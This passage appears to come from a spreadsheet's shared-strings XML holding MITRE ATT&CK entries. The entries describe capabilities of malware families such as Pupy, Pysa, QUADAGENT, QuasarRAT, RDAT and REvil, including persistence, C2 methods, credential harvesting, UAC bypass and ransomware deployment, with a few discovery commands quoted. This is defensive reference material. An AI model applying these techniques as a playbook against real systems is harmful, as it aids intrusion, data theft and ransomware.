    <t>[Proton](https://attack.mitre.org/software/S0279) modifies the tty_tickets line in the sudoers file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses macOS' .command file type to script actions.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses VNC to connect into systems.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) automatically collects data about the victim and sends it to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can overwrite files indicated by the attacker before deleting them.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) searches the local system and gathers data.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) performs data exfiltration over the control server channel using a custom protocol.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can delete files indicated by the attacker and remove itself from disk using a batch file.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists files in directories.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists processes running on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) gathers product names from the Registry key: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName&lt;/code&gt; and the processor description from the Registry key &lt;code&gt;HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString&lt;/code&gt;.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) registers itself as a service on the victim’s machine to run as a standalone process.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the network adapter information and domain/username information based on current remote sessions.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>As part of the data reconnaissance phase, [Proxysvc](https://attack.mitre.org/software/S0238) grabs the system time to send back to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) uses HTTP over SSL to communicate commands with the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) executes a binary on the system and logs the results into a temp file by using: &lt;code&gt;cmd.exe /c "&lt;file_path&gt; &gt; %temp%\PM* .tmp 2&gt;&amp;1"&lt;/code&gt;.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) can be used to download or upload a file over a network share.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029), a tool that has been used by adversaries, writes programs to the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>Microsoft Sysinternals [PsExec](https://attack.mitre.org/software/S0029) is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.(Citation: Russinovich Sysinternals)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has commands to enumerate all storage devices and to find all files that start with a particular string.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to download a file to the system from its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) uses HTTPS for C2.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) exfiltrates screenshot files to its C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) identifies files matching certain file extension and copies them to subdirectories it created.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can download and execute additional files.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) creates various subdirectories under &lt;code&gt;%Temp%\reports\%&lt;/code&gt; and copies files to those subdirectories. It also creates a folder at &lt;code&gt;C:\Users\&lt;Username&gt;\AppData\Roaming\Microsoft\store&lt;/code&gt; to store screenshot JPEG files.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) copies itself to the Startup folder to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) executes functions using rundll32.exe.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) schedules tasks to invoke its components in order to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can capture screenshots at a configurable interval.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can execute commands on the victim.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can compress data with Zip before sending it over C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192)'s default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can record sound with the microphone.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module to clear event logs with PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create domain accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can migrate into another process using reflective DLL injection.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can walk through directories and recursively search for strings in files.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can upload and download to/from a victim machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can sniff plaintext network credentials and use NBNS Spoofing to poison name services.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can execute Lazagne as well as [Mimikatz](https://attack.mitre.org/software/S0002) using PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create local system accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can interact with a victim’s Outlook session and look through folders and emails.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in module for port scanning.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list local and remote shared drives and folders over SMB.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can also perform pass-the-ticket.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module for loading and executing PowerShell scripts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list the running processes and get the process ID and parent process’s ID.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use an add on feature when creating payloads that allows you to create custom Python scripts (“scriptlets”) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) adds itself to the startup folder or adds itself to the Registry key &lt;code&gt;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run&lt;/code&gt; for persistence.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses [PsExec](https://attack.mitre.org/software/S0029) to execute a payload or commands on a remote host.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module that checks a number of indicators on the system to determine if its running on a virtual machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can grab a system’s information including the OS version, architecture, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in utility command for &lt;code&gt;netstat&lt;/code&gt;, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can be used to establish persistence using a systemd service.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can access a connected webcam and capture pictures.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can communicate over HTTP for C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used brute force attempts against a central management console, as well as some Active Directory accounts.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has extracted credentials from the password database before encrypting the files.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the capability to stop antivirus services and disable Windows Defender.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has deleted batch files after execution. (Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the functionality to delete shadow copies.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform OS credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has executed a malicious executable by naming it svchost.exe.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced Port Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used Powershell scripts to deploy its ransomware.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used Python scripts to deploy ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has laterally moved using RDP connections.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used [PsExec](https://attack.mitre.org/software/S0029) to copy and execute the ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) can stop services and processes.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced IP Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses DNS for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) has a command to delete its Registry key and scheduled task.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) used the PowerShell filenames &lt;code&gt;Office365DCOMCheck.ps1&lt;/code&gt; and &lt;code&gt;SystemDiskClean.ps1&lt;/code&gt;.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) was likely obfuscated using Invoke-Obfuscation.(Citation: Unit 42 QUADAGENT July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses PowerShell scripts for execution.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) creates a scheduled task to maintain persistence on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) encodes C2 communications with base64.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the current domain the victim system belongs to.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the victim username.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses VBScripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses HTTPS and HTTP for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses cmd.exe to execute scripts and commands on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>A [QuasarRAT](https://attack.mitre.org/software/S0262) .dll file is digitally signed by a certificate from AirVPN.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common web browsers.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can download files to the victim’s machine and execute them.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a built-in keylogger.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a command to edit the Registry on the victim’s machine.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can communicate over a reverse proxy using SOCKS5.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a module for performing remote desktop access.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) uses AES to encrypt network communication.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a command to gather system information from the victim’s machine.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can perform webcam viewing.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can launch a remote shell to execute commands on the victim’s machine.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>After decrypting itself in memory, [RARSTONE](https://attack.mitre.org/software/S0055) downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system.(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) downloads its backdoor component from a C2 server and loads it directly into memory.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) uses SSL to encrypt its communication with its C2 server.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) performs a reflective DLL injection using a given pid.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uploads and downloads information.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>There is a variant of [RATANKBA](https://attack.mitre.org/software/S0241) that uses a PowerShell script instead of the traditional PE form.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) lists the system’s processes.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the command &lt;code&gt;reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”&lt;/code&gt;.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;net view /domain&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers information about the OS architecture, OS name, and OS version/Service pack.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers the victim’s IP address via the &lt;code&gt;ipconfig -all&lt;/code&gt; command.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;netstat -ano&lt;/code&gt; to search for specific IP address ranges.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;tasklist /svc&lt;/code&gt; to display running tasks.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses HTTP/HTTPS for command and control communication.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses cmd.exe to execute commands.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses WMI to perform process monitoring.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used DNS to communicate with the C2.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. [RDAT](https://attack.mitre.org/software/S0495) can also download data from the C2 which is split into 81,920-byte portions.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used HTTP if DNS C2 communications were not functioning.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can issue SOAP requests to delete already processed C2 emails. [RDAT](https://attack.mitre.org/software/S0495) can also delete itself from the infected system.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can download files via DNS.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use email attachments for C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used Windows Video Service as a name for malicious services.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has masqueraded as VMware.exe.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via subdomains that utilize base64 with character substitutions.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can take a screenshot on the infected system.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via base32-encoded subdomains.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can also embed data within a BMP image prior to exfiltration.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can process steganographic images attached to email messages to send and receive C2 commands. [RDAT](https://attack.mitre.org/software/S0495) can also embed additional messages within BMP images to communicate with the [RDAT](https://attack.mitre.org/software/S0495) operator.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has used AES ciphertext to encode C2 communications.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has executed commands using &lt;code&gt;cmd.exe /c&lt;/code&gt;.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) has created a service when it is installed on the victim machine.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) hooks several Win32 API functions to hijack elements of the remote system management user-interface.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has the capability of deleting local files.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) has used several Win32 API functions to interact with the victim machine.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has encrypted C2 communications with the ECIES algorithm.(Citation: Kaspersky Sodin July 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can launch an instance of itself with administrative rights using runas.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) has the capability to destroy files and folders.(Citation: Kaspersky Sodin July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can encrypt files on victim systems and demands a ransom to decrypt the files.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee REvil October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
